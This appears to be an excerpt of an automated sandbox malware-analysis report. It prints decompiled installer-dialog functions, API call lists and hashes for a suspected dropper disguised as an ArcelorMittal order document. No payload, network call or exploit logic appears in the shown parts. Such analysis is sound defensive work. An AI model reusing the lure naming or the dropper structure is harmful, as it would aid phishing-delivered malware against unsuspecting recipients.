                                                0x00405033
                                                0x00405023
                                                0x00405025
                                                0x00405025
                                                0x00405053
                                                0x0040505f
                                                0x0040506e
                                                0x0040506e
                                                0x00405070
                                                0x00405073
                                                0x0040507c
                                                0x00000000
                                                0x00404f83
                                                0x00404f8e
                                                0x00404f91
                                                0x00404f96
                                                0x00404f98
                                                0x00404f9c
                                                0x00404fac
                                                0x00404fb6
                                                0x00404fb8
                                                0x00404fbb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404f9e
                                                0x00404f9e
                                                0x00404fa4
                                                0x00404fa6
                                                0x00404fa6
                                                0x00404fa7
                                                0x00404fa8
                                                0x00000000
                                                0x00404f9e
                                                0x00404f81
                                                0x00404f5c
                                                0x00404e9f
                                                0x00000000
                                                0x00404eb5
                                                0x00404ebf
                                                0x00404ec4
                                                0x00000000
                                                0x00000000
                                                0x00404ed6
                                                0x00404edb
                                                0x00404ee7
                                                0x00404ee7
                                                0x00404ee9
                                                0x00404ef8
                                                0x00404efa
                                                0x00404efe
                                                0x00404f01
                                                0x00000000
                                                0x00404f01
                                                0x00404e9f
                                                0x00404b5f
                                                0x00404b64
                                                0x00404b6d
                                                0x00404b74
                                                0x00404b82
                                                0x00404b8d
                                                0x00404b93
                                                0x00404ba1
                                                0x00404bb5
                                                0x00404bba
                                                0x00404bc7
                                                0x00404bcc
                                                0x00404be2
                                                0x00404bf3
                                                0x00404c00
                                                0x00404c00
                                                0x00404c03
                                                0x00404c09
                                                0x00404c0b
                                                0x00404c0e
                                                0x00404c13
                                                0x00404c18
                                                0x00404c1a
                                                0x00404c1a
                                                0x00404c3a
                                                0x00404c3a
                                                0x00404c3c
                                                0x00404c3d
                                                0x00404c42
                                                0x00404c45
                                                0x00404c48
                                                0x00404c4c
                                                0x00404c51
                                                0x00404c56
                                                0x00404c5a
                                                0x00404c5f
                                                0x00404c64
                                                0x00404c66
                                                0x00404c6e
                                                0x00404d39
                                                0x00404d4c
                                                0x00000000
                                                0x00404c74
                                                0x00404c77
                                                0x00404c7a
                                                0x00404c7d
                                                0x00404c7d
                                                0x00404c84
                                                0x00404c8a
                                                0x00404c8d
                                                0x00404c93
                                                0x00404c94
                                                0x00404c99
                                                0x00404ca2
                                                0x00404ca9
                                                0x00404cac
                                                0x00404caf
                                                0x00404cb2
                                                0x00404cee
                                                0x00404d17
                                                0x00404cf0
                                                0x00404cfd
                                                0x00404cfd
                                                0x00404cb4
                                                0x00404cb7
                                                0x00404cc6
                                                0x00404cd0
                                                0x00404cd8
                                                0x00404cdf
                                                0x00404ce7
                                                0x00404ce7
                                                0x00404cb2
                                                0x00404d1d
                                                0x00404d1e
                                                0x00404d2a
                                                0x00404d2a
                                                0x00404d37
                                                0x00404d52
                                                0x00404d56
                                                0x00404d73
                                                0x00404d78
                                                0x00000000
                                                0x00404d58
                                                0x00404d5d
                                                0x00404d66
                                                0x004050f0
                                                0x00405102
                                                0x00405102
                                                0x00404d56
                                                0x00000000
                                                0x00404d37
                                                0x00404c6e

                                                APIs
                                                • GetDlgItem.USER32 ref: 00404B25
                                                • GetDlgItem.USER32 ref: 00404B30
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7A
                                                • LoadBitmapW.USER32(0000006E), ref: 00404B8D
                                                • SetWindowLongW.USER32 ref: 00404BA6
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBA
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCC
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE2
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEE
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C00
                                                • DeleteObject.GDI32(00000000), ref: 00404C03
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2E
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3A
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD0
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFB
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D0F
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D3E
                                                • SetWindowLongW.USER32 ref: 00404D4C
                                                • ShowWindow.USER32(?,00000005), ref: 00404D5D
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5A
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EBF
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED4
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF8
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F18
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F2D
                                                • GlobalFree.KERNEL32 ref: 00404F3D
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB6
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040505F
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506E
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508E
                                                • ShowWindow.USER32(?,00000000), ref: 004050DC
                                                • GetDlgItem.USER32 ref: 004050E7
                                                • ShowWindow.USER32(00000000), ref: 004050EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: 7e0d7925856d8dc2a293aec0a36156ab26fb8fad00dbeb743b55e37ef2f2f0d3
                                                • Instruction ID: d02e9a787b540977323fb19233601523635b60db84404d8275966fa362dc0732
                                                • Opcode Fuzzy Hash: 7e0d7925856d8dc2a293aec0a36156ab26fb8fad00dbeb743b55e37ef2f2f0d3
                                                • Instruction Fuzzy Hash: 81027EB0900209EFEB109F94DD85AAE7BB5FB85314F10813AF610BA2E1CB799D51CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404591 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E00404591(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f18; // 0x86533c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040575B(0x3fb, _t146);
					E004062C6(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040575B(0x3fb, _t146);
							if(E00405AEE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406032(0x79ff10, _t146);
							_t87 = E00406408(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406032(0x79ff10, _t146);
								_t89 = E00405A91(0x79ff10);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff10,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff10) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff10,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405A32(0x79ff10);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff10) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404A2E(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x7a7a1c; // 0x8681a6
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A16(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff00);
									} else {
										E0040494D(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8ae4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404118(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f30 == _t158) {
									E00404526();
								}
								 *0x7a1f30 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f40;
							_v60 = E004048E7;
							_v56 = _t146;
							_v68 = E00406054(_t146, 0x7a1f40, _t167, 0x7a0718, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004059E6(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8a50 + 0x11c));
								if( *((intOrPtr*)( *0x7a8a50 + 0x11c)) != 0 && _t146 == L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis") {
									E00406054(_t146, 0x7a1f40, _t167, 0, _t125);
									if(lstrcmpiW(0x7a69e0, 0x7a1f40) != 0) {
										lstrcatW(_t146, 0x7a69e0);
									}
								}
								 *0x7a1f30 =  *0x7a1f30 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405A5D(_t146) != 0 && E00405A91(_t146) == 0) {
						E004059E6(_t146);
					}
					 *0x7a7a18 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004040F6(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004040F6(_t167);
					E0040412B(_t166);
					_t138 = E00406408(6);
					if(_t138 == 0) {
						L53:
						return E0040415D(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}














































                                                0x00404591
                                                0x00404597
                                                0x0040459d
                                                0x004045aa
                                                0x004045b8
                                                0x004045bb
                                                0x004045c3
                                                0x004045c9
                                                0x004045c9
                                                0x004045d5
                                                0x004045d8
                                                0x00404646
                                                0x0040464d
                                                0x00404724
                                                0x0040472b
                                                0x0040473a
                                                0x0040473a
                                                0x0040473e
                                                0x00404748
                                                0x00404755
                                                0x00404757
                                                0x00404757
                                                0x00404765
                                                0x0040476c
                                                0x00404773
                                                0x00404776
                                                0x004047b2
                                                0x004047b4
                                                0x004047ba
                                                0x004047bf
                                                0x004047c3
                                                0x004047c5
                                                0x004047c5
                                                0x004047e1
                                                0x00000000
                                                0x004047e3
                                                0x004047e6
                                                0x004047f4
                                                0x004047fa
                                                0x004047fb
                                                0x004047fe
                                                0x00404801
                                                0x00000000
                                                0x00404801
                                                0x00404778
                                                0x0040477a
                                                0x0040477e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404780
                                                0x00404780
                                                0x0040478d
                                                0x00404792
                                                0x00000000
                                                0x00000000
                                                0x00404796
                                                0x00404798
                                                0x00404798
                                                0x004047a1
                                                0x004047a3
                                                0x004047a8
                                                0x004047ab
                                                0x004047b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004047b0
                                                0x0040480d
                                                0x00404817
                                                0x0040481a
                                                0x0040481d
                                                0x00404824
                                                0x00404824
                                                0x00404826
                                                0x00404826
                                                0x0040482b
                                                0x0040482d
                                                0x00404835
                                                0x0040483c
                                                0x0040483e
                                                0x00404849
                                                0x00404849
                                                0x0040483e
                                                0x00404850
                                                0x00404859
                                                0x00404863
                                                0x0040486b
                                                0x00404886
                                                0x0040486d
                                                0x00404876
                                                0x00404876
                                                0x0040486b
                                                0x0040488b
                                                0x00404890
                                                0x00404895
                                                0x0040489e
                                                0x0040489e
                                                0x004048a7
                                                0x004048a9
                                                0x004048a9
                                                0x004048b5
                                                0x004048bd
                                                0x004048c7
                                                0x004048c7
                                                0x004048cc
                                                0x00000000
                                                0x004048cc
                                                0x00404776
                                                0x0040472d
                                                0x00404734
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404734
                                                0x00404653
                                                0x0040465c
                                                0x00404676
                                                0x0040467b
                                                0x00404685
                                                0x0040468c
                                                0x00404698
                                                0x0040469b
                                                0x0040469e
                                                0x004046a5
                                                0x004046ad
                                                0x004046b0
                                                0x004046b4
                                                0x004046bb
                                                0x004046c3
                                                0x0040471d
                                                0x004046c5
                                                0x004046c6
                                                0x004046cd
                                                0x004046d7
                                                0x004046df
                                                0x004046ec
                                                0x00404700
                                                0x00404704
                                                0x00404704
                                                0x00404700
                                                0x00404709
                                                0x00404716
                                                0x00404716
                                                0x004046c3
                                                0x00000000
                                                0x0040467b
                                                0x00404669
                                                0x00000000
                                                0x00000000
                                                0x0040466f
                                                0x00000000
                                                0x004045da
                                                0x004045e7
                                                0x004045f0
                                                0x004045fd
                                                0x004045fd
                                                0x00404604
                                                0x0040460a
                                                0x00404613
                                                0x00404616
                                                0x00404619
                                                0x00404621
                                                0x00404624
                                                0x00404627
                                                0x0040462d
                                                0x00404634
                                                0x0040463b
                                                0x004048d2
                                                0x004048e4
                                                0x00404641
                                                0x00404644
                                                0x00000000
                                                0x00404644
                                                0x0040463b

                                                APIs
                                                • GetDlgItem.USER32 ref: 004045E0
                                                • SetWindowTextW.USER32(00000000,?), ref: 0040460A
                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046BB
                                                • CoTaskMemFree.OLE32(00000000), ref: 004046C6
                                                • lstrcmpiW.KERNEL32(ExecToStack,007A1F40,00000000,?,?), ref: 004046F8
                                                • lstrcatW.KERNEL32(?,ExecToStack), ref: 00404704
                                                • SetDlgItemTextW.USER32 ref: 00404716
                                                  • Part of subcall function 0040575B: GetDlgItemTextW.USER32(?,?,00000400,0040474D), ref: 0040576E
                                                  • Part of subcall function 004062C6: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00406329
                                                  • Part of subcall function 004062C6: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 00406338
                                                  • Part of subcall function 004062C6: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 0040633D
                                                  • Part of subcall function 004062C6: CharPrevW.USER32(0040A300,0040A300,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,00000000,00403258,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 00406350
                                                • GetDiskFreeSpaceW.KERNEL32(0079FF10,?,?,0000040F,?,0079FF10,0079FF10,?,00000001,0079FF10,?,?,000003FB,?), ref: 004047D9
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047F4
                                                  • Part of subcall function 0040494D: lstrlenW.KERNEL32(007A1F40,007A1F40,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049EE
                                                  • Part of subcall function 0040494D: wsprintfW.USER32 ref: 004049F7
                                                  • Part of subcall function 0040494D: SetDlgItemTextW.USER32 ref: 00404A0A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$ExecToStack
                                                • API String ID: 2624150263-2684797225
                                                • Opcode ID: 23919bb9406077de8126e392a934b699bf4a802904ea86574e2f4141f427e215
                                                • Instruction ID: 30da9b98090b1fe5a0259897bb92749c5f748b87693770e47a0c546725bed2a9
                                                • Opcode Fuzzy Hash: 23919bb9406077de8126e392a934b699bf4a802904ea86574e2f4141f427e215
                                                • Instruction Fuzzy Hash: 3FA19FB1900208ABDB11EFA5CD81AAFB7B8EF85354F10843BF601B62D1D77C89418B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 39%
                                                			E004027FB(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402BBF(2), _t21 - 0x2b0) != 0xffffffff) {
					E00405F79( *((intOrPtr*)(_t21 - 0x10)), _t8);
					_push(_t21 - 0x284);
					_push(__esi);
					E00406032();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0x10)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                0x00402813
                                                0x0040282e
                                                0x00402839
                                                0x0040283a
                                                0x00402970
                                                0x00402815
                                                0x00402818
                                                0x0040281b
                                                0x0040281e
                                                0x0040281e
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 75eab62fdf78de9f4e6b4c6b34eb097f986102a6510b1718f60f797d7a21670f
                                                • Instruction ID: a3d3032162d61e1c1d424b84de3592b50f389daf4c4fdff0a19fa7bc5af75a0d
                                                • Opcode Fuzzy Hash: 75eab62fdf78de9f4e6b4c6b34eb097f986102a6510b1718f60f797d7a21670f
                                                • Instruction Fuzzy Hash: 2BF05E716001149BC701EBA4DE49AAEB378FF04324F10457BE115E31D1D6B88A409B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404293 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E00404293(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				char _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t108;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L13:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x79ff0c =  *0x79ff0c + 1;
								__eflags =  *0x79ff0c;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040415D(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
								_t113 =  *((intOrPtr*)(_t114 + 0x18));
								_v12 = _t103;
								__eflags = _t103 - _t113 - 0x800;
								_v16 = _t113;
								_v8 = 0x7a69e0;
								if(_t103 - _t113 < 0x800) {
									SendMessageW(_t56, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorW(0, 0x7f02));
									_t44 =  &_v8; // 0x7a69e0
									ShellExecuteW(_a4, L"open",  *_t44, 0, 0, 1);
									SetCursor(LoadCursorW(0, 0x7f00));
									_t114 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
							goto L28;
						} else {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8a48, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8a48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L27;
					}
					__eflags =  *0x79ff0c; // 0x0
					if(__eflags != 0) {
						goto L27;
					}
					_t69 =  *0x7a0f18; // 0x86533c
					_t29 = _t69 + 0x14; // 0x865350
					_t116 = _t29;
					__eflags =  *_t116 & 0x00000020;
					if(( *_t116 & 0x00000020) == 0) {
						goto L27;
					}
					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t108;
					 *_t116 = _t108;
					E00404118(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404526();
					goto L13;
				} else {
					_t117 = _a16;
					_t75 =  *(_t117 + 0x30);
					if(_t75 < 0) {
						_t111 =  *0x7a7a1c; // 0x8681a6
						_t75 =  *(_t111 - 4 + _t75 * 4);
					}
					_t76 =  *0x7a8a78 + _t75 * 2;
					_t110 =  *_t76 & 0x0000ffff;
					_a8 = _t110;
					_t78 =  &(_t76[1]);
					_a16 = _t78;
					_v16 = _t78;
					_v12 = 0;
					_v8 = E00404244;
					if(_t110 != 2) {
						_v8 = E0040420A;
					}
					_push( *((intOrPtr*)(_t117 + 0x34)));
					_push(0x22);
					E004040F6(_a4);
					_push( *((intOrPtr*)(_t117 + 0x38)));
					_push(0x23);
					E004040F6(_a4);
